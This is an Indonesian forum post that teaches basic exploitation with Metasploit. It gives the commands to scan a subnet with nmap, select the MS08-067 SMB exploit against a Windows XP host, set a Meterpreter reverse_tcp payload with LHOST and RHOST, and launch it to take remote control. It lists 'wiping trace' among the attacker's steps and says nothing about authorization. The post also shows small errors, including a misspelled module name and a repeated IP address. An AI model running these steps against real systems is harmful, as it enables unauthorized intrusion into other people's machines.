Ngerasa bersalah juga sih setelah menyadari kalo ternyata saya mulai post thread metasploit tingkat mengangah ke atas tanpa ada pengenalan metasploit.
Jadi langsung aja ya, saya bahas dasar metasploit.

Exploitasi adalah sebuah pemanfaatan vulnerable system yang memungkinkan terjadinya remote system oleh user yang tidak terautentikasi. Dalam dunia exploitasi, software yang terkenal untuk exploitasi adalah metasploit.

Exploitasi memang terdengar sulit, namun pengaplikasiannya sangat mudah. Kita cukup mengenal siklus hacker bekerja, yaitu:
1. Information Gathering
2. Vulnerability Assessment
3. Gaining Access
4. Maintaining Access
5. Wiping Trace
Pertama kali, kita harus mencari informasi target. Dalam Backtrack, hal ini bisa dilakukan dengan menggunakan nmap. Untuk memahaminya, gunakan command:

nmap 172.16.128.1/24

Command ini berfungsi untuk melakukan scanning pada network dengan kisaran IP => 172.16.128.1 sampai 172.16.128.255.

[spoiler][/spoiler]

Terlihat pada hasil scan nmap, ada dua host yang up yaitu:
172.16.128.1 [ip saya]
172.16.128.1 [ip target]
Kemudian langkah selanjutnya adalah melakukan scanning pada host yang up dengan nmap. Command dasarnya adalah:

nmap [ip-host]

Jika target host kamu adalah 172.16.129.128, maka gunakan:

nmap 172.16.129.128

[spoiler][/spoiler]

Terlihat bahwa host 172.16.129.128 memiliki tiga port yang terbuka yaitu:
135
139
445
Dan menggunakan sistem operasi Windows dengan port 445 yang terbuka. Langkah berikutnya adalah menentukan exploit yang bisa digunakan untuk memicu vulnerability. Untuk melihat exploit yang bisa digunakan, bukalah console metasploit dengan command:

msfconsole

Lalu ketik:

msf > show exploits

[spoiler][/spoiler]

Untuk sistem operasi Windows XP dengan port 445 yang terbuka, kita bisa menggunakan modul exploit ms08_06_netapi

Gunakan perintah:

msf > use exploit/windows/smb/ms08_067_netapi 

[spoiler][/spoiler]

Setelah itu gunakan payload, sebagai penghubung exploit dengan remote system. Untuk melihat payload yang bisa digunakan, gunakan perintah:

msf > show payloads

[spoiler][/spoiler]

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp

[spoiler][/spoiler]

Perintah ini akan membuat exploit berinteraksi dengan meterpreter melalui TCP. Setelah itu, set local remote yang akan dijadikan base exploit. Gunakan commmand:

msf exploit(ms08_067_netapi) > set LHOST 172.16.129.1 

Perlu diperhatikan, untuk local remote, gunakan IP kita sendiri.

[spoiler][/spoiler]

Kemudian, tentukan remote host atau IP target exploitasi. Gunakan perintah:

msf exploit(ms08_067_netapi) > set RHOST 172.16.129.128

[spoiler][img[http://4.bp.blogspot.com/-wB0xtQxkmbQ/TpTvxTgR_6I/AAAAAAAAAKQ/bh7PURnV3gs/s1600/set-rhost.png[/img][/spoiler]

Setelah itu, cek kembali dependency modul yang akan diekseskusi dengan menggunakan perintah:

msf exploit(ms08_067_netapi) > show options

[spoiler][/spoiler]


Setelah semua options terisi dengan benar, lakukan eksekusi eksploitasi dengan perintah:

msf exploit(ms08_067_netapi) > exploit

Terlihat bahwa metasploit langsung berinteraksi dengan modul payload meterpreter.

Dengan payload meterpreter yang telah aktif, berarti kita telah berhasil melakukan eksploitasi. Cukup kali ini basic exploitation yang saya sampaikan. Berikutnya akan ada basic meterpreter untuk memahami basic command meterpreter.

Semoga membantu
@fanglisinaulan